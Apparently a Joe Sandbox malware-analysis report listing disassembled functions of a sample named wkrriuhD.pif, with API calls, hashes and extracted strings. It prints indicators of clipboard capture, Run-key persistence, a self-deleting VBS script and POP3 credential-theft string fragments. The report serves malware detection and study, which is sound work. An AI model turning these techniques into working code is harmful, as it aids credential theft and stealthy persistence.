                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                          • Opcode ID: 963819a694bcc1539e3d2d00772d3d43af7752de524663cf03860bd13ded104a
                                                                                                                                                                                          • Instruction ID: 900b338158f01663df4267886e4e406d921147b0e453c9650ab5f91823f7dbb3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 963819a694bcc1539e3d2d00772d3d43af7752de524663cf03860bd13ded104a
                                                                                                                                                                                          • Instruction Fuzzy Hash: CFE04F35400114AFCF126F14DD89A493B2DEF60749B284024F90447561CB35EC83CA44
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 123732B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,1237328B,?), ref: 123732D6
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,1237328B,?), ref: 123732DD
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 123732EF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                          • Opcode ID: 2f5af13b26b6cd7b5a5941550b32dc10ba4181751858d391d4334185892dca7c
                                                                                                                                                                                          • Instruction ID: ad7f27b8e8d91fd5bc9a665bd27ccd94725d30178a94fcc84172f2abd90fcc83
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f5af13b26b6cd7b5a5941550b32dc10ba4181751858d391d4334185892dca7c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 26E0867249118CEFCF125F54CC4DA983B6DFF84751F004614F90A4A220CB3AE941CB81
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 1233B711
                                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 1233B71D
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 1233B725
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Clipboard$CloseDataOpen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2058664381-0
                                                                                                                                                                                          • Opcode ID: e38c508bf9d343da422eca1962b1d1f6de5657038e580a3e48bdb28f47c12e17
                                                                                                                                                                                          • Instruction ID: 383e4654ed063a115fa419db9397ed2aa0a2a6a4eb2426f59934913d012a5cf8
                                                                                                                                                                                          • Opcode Fuzzy Hash: e38c508bf9d343da422eca1962b1d1f6de5657038e580a3e48bdb28f47c12e17
                                                                                                                                                                                          • Instruction Fuzzy Hash: E0E01276A857309FD3269B608C88BDA7B99DF91B52F418A18F54DAF284D770C900CAB1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401108 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?), ref: 0040111D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InformationTimeZone
                                                                                                                                                                                          • String ID: %c%02d%02d
                                                                                                                                                                                          • API String ID: 565725191-130934884
                                                                                                                                                                                          • Opcode ID: 32cf130213eecde94f51183987d16ea9f05b90516b33602c580cd9a43cce8069
                                                                                                                                                                                          • Instruction ID: db6e9c4b4596cdb9f36f65c264d6bf5f60ea79063c65877f082d70517f5d5989
                                                                                                                                                                                          • Opcode Fuzzy Hash: 32cf130213eecde94f51183987d16ea9f05b90516b33602c580cd9a43cce8069
                                                                                                                                                                                          • Instruction Fuzzy Hash: 67F0C2B2F1222597EB18D56A8C82E5B735ECB49324F1841BAF94DF7390E138DD0086A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005C5A34 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                                                          • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                                                                                                                                          • Instruction ID: d698cc67ebcda8e1753ef9bc8fd89a4a1712b0b114d5afbe3312bc8b6c1e68d7
                                                                                                                                                                                          • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C513D719006098FEB24CFA9D985B9EBFF4FB48314F24856ED419E7264E378A980CF50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005D4097 Relevance: 1.3, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: PkGNG
                                                                                                                                                                                          • API String ID: 0-263838557
                                                                                                                                                                                          • Opcode ID: 2714db990c485d3c482822e4496f4e6700112c11046368f118222e6140812f9a
                                                                                                                                                                                          • Instruction ID: 1d0b61a1534f5a28c866cdf3a94cd12903ffcd6a81b0139a2722384c6c65163a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2714db990c485d3c482822e4496f4e6700112c11046368f118222e6140812f9a
                                                                                                                                                                                          • Instruction Fuzzy Hash: A3E0B632000248FBCF21AF58DD0DA993FAAFB40352F044966F9058B636DB36DD92CE45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004018AE Relevance: 68.5, APIs: 20, Strings: 19, Instructions: 297stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000100), ref: 004018E5
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00401957
                                                                                                                                                                                          • CharLowerBuffA.USER32(?,00000000,?), ref: 00401964
                                                                                                                                                                                          • OpenSemaphoreA.KERNEL32(001F0003,00000000,?), ref: 0040199D
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004019A7
                                                                                                                                                                                            • Part of subcall function 00401612: RegOpenKeyA.ADVAPI32(80000000,?,?), ref: 0040163A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Restarting Mercury after apparent abnormal termination, xrefs: 00401C2F
                                                                                                                                                                                          • :\/, xrefs: 00401975
                                                                                                                                                                                          • W, xrefs: 00401B59
                                                                                                                                                                                          • mercury32.pmail.com.run.%.60s, xrefs: 0040193C
                                                                                                                                                                                          • D, xrefs: 00401A77
                                                                                                                                                                                          • Mercury/32 Loader Started, xrefs: 0040192A
                                                                                                                                                                                          • Restarting Mercury after scheduled daily exit, xrefs: 00401C21
                                                                                                                                                                                          • Abnormal terminations continued after attempted recovery - exiting., xrefs: 00401C59
                                                                                                                                                                                          • Multiple sessions from the same install directory detected - terminating, xrefs: 004019BF
                                                                                                                                                                                          • %s\mercury.exe -E, xrefs: 004019E8
                                                                                                                                                                                          • Loader encountered Windows error %d creating Mercury/32 process., xrefs: 00401AD8
                                                                                                                                                                                          • There is already a copy of Mercury/32 running from this directory.Only one copy may be run at a time from any given install directory., xrefs: 004019B3
                                                                                                                                                                                          • %s\m32-ssu.run, xrefs: 00401BEB
                                                                                                                                                                                          • Normal operation restored - resetting counters., xrefs: 00401B93
                                                                                                                                                                                          • Recovery complete - attempting to restart Mercury., xrefs: 00401C7A
                                                                                                                                                                                          • %s\m32.run, xrefs: 00401BB7
                                                                                                                                                                                          • Too many abnormal terminations in time period - attempting recovery., xrefs: 00401C66
                                                                                                                                                                                          • Mercury/32 Loader shutting down., xrefs: 00401C93
                                                                                                                                                                                          • Mercury/32 Loader Error, xrefs: 004019AE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Open$BuffCharCloseFileHandleLowerModuleNameSemaphorelstrlen
                                                                                                                                                                                          • String ID: %s\m32-ssu.run$%s\m32.run$%s\mercury.exe -E$:\/$Abnormal terminations continued after attempted recovery - exiting.$D$Loader encountered Windows error %d creating Mercury/32 process.$Mercury/32 Loader Error$Mercury/32 Loader Started$Mercury/32 Loader shutting down.$Multiple sessions from the same install directory detected - terminating$Normal operation restored - resetting counters.$Recovery complete - attempting to restart Mercury.$Restarting Mercury after apparent abnormal termination$Restarting Mercury after scheduled daily exit$There is already a copy of Mercury/32 running from this directory.Only one copy may be run at a time from any given install directory.$Too many abnormal terminations in time period - attempting recovery.$W$mercury32.pmail.com.run.%.60s
                                                                                                                                                                                          • API String ID: 527459832-2152591341
                                                                                                                                                                                          • Opcode ID: b0d4473151f15ca73830767efba8d346a64182bbbe90ef72b456baf54c05cbdd
                                                                                                                                                                                          • Instruction ID: 9b5fbd67cbc3e190377a54b581c7df8cf1cf74e5fc47f7b393678a9f4ffd1dd2
                                                                                                                                                                                          • Opcode Fuzzy Hash: b0d4473151f15ca73830767efba8d346a64182bbbe90ef72b456baf54c05cbdd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 82A19AB19443196ADB10E7A18C43FEA73789F44704F1045BFF644B61D2EBBC96888EAD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1234B047 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 1234B13C
                                                                                                                                                                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 1234B150
                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,123960A4), ref: 1234B178
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,123A4EE0,00000000), ref: 1234B18E
                                                                                                                                                                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 1234B1CF
                                                                                                                                                                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 1234B1E7
                                                                                                                                                                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 1234B1FC
                                                                                                                                                                                          • SetEvent.KERNEL32 ref: 1234B219
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 1234B22A
                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 1234B23A
                                                                                                                                                                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 1234B25C
                                                                                                                                                                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 1234B266
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                                                                                                                          • API String ID: 738084811-1354618412
                                                                                                                                                                                          • Opcode ID: 3346f35e356ac6c7a744b53d370f61b51a8bf87c58edbfd3ed28f790061be05d
                                                                                                                                                                                          • Instruction ID: aaeab8e4310ad0c48829dfd6c726097398192754f53b34e7203b37d985ab296f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3346f35e356ac6c7a744b53d370f61b51a8bf87c58edbfd3ed28f790061be05d
                                                                                                                                                                                          • Instruction Fuzzy Hash: EB51E3B76442446FD665A730CC90EBF37ADEB85355F104A29F14A86190EF20AE08C762
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233D096 Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 260registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 12342850: TerminateProcess.KERNEL32(00000000,pth_unenc,1233F8C8), ref: 12342860
                                                                                                                                                                                            • Part of subcall function 12342850: WaitForSingleObject.KERNEL32(000000FF), ref: 12342873
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,123A52F0,?,pth_unenc), ref: 1233D1A5
                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 1233D1B8
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,123A52F0,?,pth_unenc), ref: 1233D1E8
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,123A52F0,?,pth_unenc), ref: 1233D1F7
                                                                                                                                                                                            • Part of subcall function 1233B8AC: TerminateThread.KERNEL32(Function_0000A27D,00000000,123A52F0,pth_unenc,1233D0B8,123A52D8,123A52F0,?,pth_unenc), ref: 1233B8BB
                                                                                                                                                                                            • Part of subcall function 1233B8AC: UnhookWindowsHookEx.USER32(123A50F0), ref: 1233B8C7
                                                                                                                                                                                            • Part of subcall function 1233B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 1233B8D5
                                                                                                                                                                                            • Part of subcall function 1234B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,12396468,1233D20D,.vbs,?,?,?,?,?,123A52F0), ref: 1234B99F
                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,12396468,12396468,00000000), ref: 1233D412
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 1233D419
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                          • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                                                                                          • API String ID: 3797177996-3018399277
                                                                                                                                                                                          • Opcode ID: 8c1309cec531426f92d2233474ba08b2f264e448bae47fa13f278ce7c10a4e25
                                                                                                                                                                                          • Instruction ID: 1940e927fc56a1b2d018cecce4607e169dde330db61656635eeb830ed6ca67bc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c1309cec531426f92d2233474ba08b2f264e448bae47fa13f278ce7c10a4e25
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F81947B6043405FD7AAE720DC54AFF77A9AF95302F50492DE086972D0EF24AF09C692
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12337270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\Public\Libraries\wkrriuhD.pif,00000001,1233764D,C:\Users\Public\Libraries\wkrriuhD.pif,00000003,12337675,123A52D8,123376CE), ref: 12337284
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1233728D
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 123372A2
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 123372A5
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 123372B6
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 123372B9
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 123372CA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 123372CD
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 123372DE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 123372E1
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 123372F2
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 123372F5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                          • String ID: C:\Users\Public\Libraries\wkrriuhD.pif$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                                                          • API String ID: 1646373207-3749497233
                                                                                                                                                                                          • Opcode ID: be103768801afa19bedf7ef3439723dd266a0c089968dd8c18e5972c4c0fd8db
                                                                                                                                                                                          • Instruction ID: 04322883a49d478bb1b57bef8bd1398d444112e507df4c466138de3dd3178d4a
                                                                                                                                                                                          • Opcode Fuzzy Hash: be103768801afa19bedf7ef3439723dd266a0c089968dd8c18e5972c4c0fd8db
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D0175F2D9633A6EEB076B3A4C94D4B6FDC9E912523064D37F809D2102EE78C401DE60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1464173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 14641CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 14641D1B
                                                                                                                                                                                            • Part of subcall function 14641CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 14641D37
                                                                                                                                                                                            • Part of subcall function 14641CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 14641D4B
                                                                                                                                                                                          • _strlen.LIBCMT ref: 14641855
                                                                                                                                                                                          • _strlen.LIBCMT ref: 14641869
                                                                                                                                                                                          • _strlen.LIBCMT ref: 1464188B
                                                                                                                                                                                          • _strlen.LIBCMT ref: 146418AE
                                                                                                                                                                                          • _strlen.LIBCMT ref: 146418C8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _strlen$File$CopyCreateDelete
                                                                                                                                                                                          • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                                          • API String ID: 3296212668-3023110444
                                                                                                                                                                                          • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                          • Instruction ID: a79f6efa6a57e815cb9ff726c5aa28013dcf3589525fdd6ead32ed78ec3b4119
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                          • Instruction Fuzzy Hash: CB6135B5F01319EFEF12CBE4C844BDEB7B9AF15208F284056D204B7254EB706A46CB5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1234C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 1234C036
                                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 1234C04E
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 1234C067
                                                                                                                                                                                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 1234C0A2
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 1234C0B5
                                                                                                                                                                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 1234C0F9
                                                                                                                                                                                          • lstrcmpW.KERNEL32(?,?), ref: 1234C114
                                                                                                                                                                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 1234C12C
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 1234C13B
                                                                                                                                                                                          • FindVolumeClose.KERNEL32(?), ref: 1234C15B
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 1234C173
                                                                                                                                                                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 1234C1A0
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 1234C1B9
                                                                                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 1234C1C8
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 1234C1D0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                          • API String ID: 3941738427-1684325040
                                                                                                                                                                                          • Opcode ID: 7e210bf982852010391deeb4bceac2a14e486fa02cc38b745c4577cedc56cb00
                                                                                                                                                                                          • Instruction ID: f1ea35c76abb9b87f635db7163760eefe63e85b7ac510883b35a15238416bcd0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e210bf982852010391deeb4bceac2a14e486fa02cc38b745c4577cedc56cb00
                                                                                                                                                                                          • Instruction Fuzzy Hash: FD41AD72508386ABD711DF60DC8CAEBB7ECAB94354F100E6AF545C6260EB70D649CBD2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 146419B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _strlen
